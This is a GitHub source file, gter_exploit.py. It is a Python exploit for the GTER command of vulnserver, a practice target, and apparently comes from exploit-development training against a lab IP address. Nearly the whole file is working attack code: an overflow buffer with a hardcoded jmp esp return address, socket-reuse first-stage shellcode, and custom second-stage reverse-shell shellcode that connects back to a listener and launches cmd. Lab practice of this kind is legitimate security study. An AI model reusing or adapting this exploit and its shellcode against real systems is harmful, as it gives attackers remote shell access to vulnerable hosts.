-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathgter_exploit.py
92 lines (79 loc) · 2.82 KB
/
gter_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/python
import socket
import os
import sys
import struct
from time import sleep
host = "172.16.10.129"
port = 9999
size = 174
eip_offset = 151
# Badchar \x00
# 0x625011d3 : jmp esp | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (c:\Users\kartone\Desktop\vulnserver-master\essfunc.dll)
# Call to recv => CALL 0040252C
# SocketReuse to receive 2nd stage
#
# PUSH ESP # 0x54
# POP ECX # 0x59
# ADD CX, 0x188 #\x66\x81\xC1\x88\x01
# PUSH ESP #\x54
# POP EDX # \x5a
# SUB DL, 0xb0 #80EAB0
# MOV ESP, EDX # \x89\xd4
# XOR EAX, EAX # \x31\xc0
# PUSH EAX ; 1 param \x50
# ADD AH, 4 #80C404
# PUSH EAX ; 2 param \x50
# PUSH ESP # \x54
# POP EAX # \x58
# ADD EAX, 0x60 #83C060
# PUSH EAX ; 3 param \x50
# PUSH DWORD PTR DS:[ECX] ; 4 param \xff\x31
# MOV EAX, 0x40252CAA # \xB8\xAA\x2C\x25\x40
# SHR EAX, 8 # \xC1\xE8\x08
# CALL EAX # \xff\xd0
shellcode = ""
shellcode += "\x54"
shellcode += "\x59"
shellcode += "\x66\x81\xC1\x88\x01"
shellcode += "\x54"
shellcode += "\x5a"
shellcode += "\x80\xEA\xB0"
shellcode += "\x89\xd4"
shellcode += "\x31\xc0"
shellcode += "\x50"
shellcode += "\x80\xC4\x04"
shellcode += "\x50"
shellcode += "\x54"
shellcode += "\x58"
shellcode += "\x83\xC0\x60"
shellcode += "\x50"
shellcode += "\xff\x31"
shellcode += "\xB8\xAA\x2C\x25\x40"
shellcode += "\xC1\xE8\x08"
shellcode += "\xff\xd0"
nop_align = "\x90" * 3
buffer = ""
buffer += nop_align
buffer += shellcode
buffer += "\x90" * (eip_offset - len(buffer))
buffer += struct.pack('<L', 0x625011d3)
buffer += "\x54\x5b\x80\xEB\x9b\xff\xe3" # PUSH ESP, POP EBX, SUB bl,155, jmp ebx
buffer += "\x41" # padding
#buffer += "B" * (size - len(buffer))
command = "GTER " + buffer
# My custom reverse shell: it bypass ASLR getting Base Address of WS2_32 and Kernel32 from a pointer on the stack during execution and then buid che call to WSASocketA, WS2_32.connect and CreateProcessA based on that addresses
payload = ""
payload += "\x31\xd2\x89\xe2\x83\xea\x38\x8b\x12\x66\xba\x2a\xc8\x31\xc0\x50\x50\x50\x31\xdb\xb3\x06\x53\x40\x50\x40\x50\x89\xd3\x31\xc0\xff\xd3\x96\x66\xbb\xdd\x6b\x93\x68\xac\x10\x0a\x82\x66\x68\x11\x5c\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x56\xff\xd0\x31\xd2\x89\xe2\x81\xea\x9c\xf9\xff\xff\x8b\x12\x66\xba\x72\x10\x89\xd7\xba\x63\x63\x6d\x64\xc1\xea\x08\x52\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x56\x56\x56\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50\x52\x52\x51\x52\xff\xd7"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to the server..."
s.connect((host,port))
print s.recv(1024)
print "[+] Sending evil payload..."
s.send(command)
print "[+] Sending second payload..."
sleep(2)
s.send(payload)
print "[+] Second payload sent! Check your netcat..."
print s.recv(1024)
s.close()